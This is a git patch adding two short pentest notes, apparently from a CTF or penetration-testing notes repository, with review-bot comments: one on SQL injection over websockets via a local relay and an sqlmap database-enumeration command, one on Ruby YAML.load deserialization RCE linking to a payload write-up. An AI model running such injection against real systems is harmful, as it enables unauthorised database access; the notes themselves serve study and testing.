From 37e21812c15241cb100b362082fb74b8afc56e42 Mon Sep 17 00:00:00 2001 From: whx Date: Thu, 19 Jan 2023 16:17:10 +0100 Subject: [PATCH] bump --- Exploits/Databases/Websocket SQLi.md | 13 +++++++++++++ Exploits/Ruby/yaml_load.md | 4 ++++ 2 files changed, 17 insertions(+) create mode 100644 Exploits/Databases/Websocket SQLi.md create mode 100644 Exploits/Ruby/yaml_load.md diff --git a/Exploits/Databases/Websocket SQLi.md b/Exploits/Databases/Websocket SQLi.md new file mode 100644 index 0000000..c81cb6f --- /dev/null +++ b/Exploits/Databases/Websocket SQLi.md @@ -0,0 +1,13 @@ +# Websocket SQLi + +* SQLmap is not able to send websocket requests directly because of the id added to the request. Therefore you need a local webserver as a middleware which translates requests to the target. Put in the webserver URL, and the correct data structure into the script and run it.o + +```sh +sqlmap -u "http://127.0.0.1:8081/?id=62009" -p "id" --dbs +``` + +## References + +* [rayhan0x01's git repo](https://github.com/rayhan0x01/nodejs-websocket-sqli) +* [rayhan0x01's blog entry](https://rayhan0x01.github.io/ctf/2021/04/02/blind-sqli-over-websocket-automation.html) + diff --git a/Exploits/Ruby/yaml_load.md b/Exploits/Ruby/yaml_load.md new file mode 100644 index 0000000..5ea0f25 --- /dev/null +++ b/Exploits/Ruby/yaml_load.md @@ -0,0 +1,4 @@ +# YAML.load deserialization + +RCE is is possible via YAML file deserialization through `yaml.load()`. +* [staadraad describes how and provides a payload](https://staaldraad.github.io/post/2021-01-09-universal-rce-ruby-yaml-load-updated/)
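Review bot: In the `Exploits/Databases/Websocket SQLi.md` hunk, the bullet ends with a stray character ("run it.o") and the explanation of why sqlmap needs the middleware is hard to follow: "because of the id added to the request" does not explain the limitation. Suggest rewording to say that sqlmap issues plain HTTP requests, so a local HTTP server is needed to relay each request as a websocket message to the target and return the response (this is what the linked rayhan0x01 repo does), and that the `id` query parameter in the GET request is what the relay copies into the websocket message. "Put in the webserver URL, and the correct data structure into the script" should also name which script is meant (the relay from the referenced repo) and make explicit that `http://127.0.0.1:8081/?id=62009` in the sqlmap command is the local relay, not the target, and that `-p "id"` must match the parameter name the relay reads.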
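Review bot: In the `Exploits/Ruby/yaml_load.md` hunk, "RCE is is possible" duplicates "is", and the body writes `yaml.load()` while the heading and the linked post are about Ruby's `YAML.load`; use the Ruby spelling consistently. The reference is also misspelled: the URL is staaldraad.github.io, so the link text should read "staaldraad". The note would be more useful with its preconditions stated: the payload only matters when attacker-controlled YAML reaches `YAML.load`, and the affected versions should be named, since Psych 4 (the default in Ruby 3.1) made `YAML.load` behave like `safe_load` and moved the unsafe behaviour to `YAML.unsafe_load`.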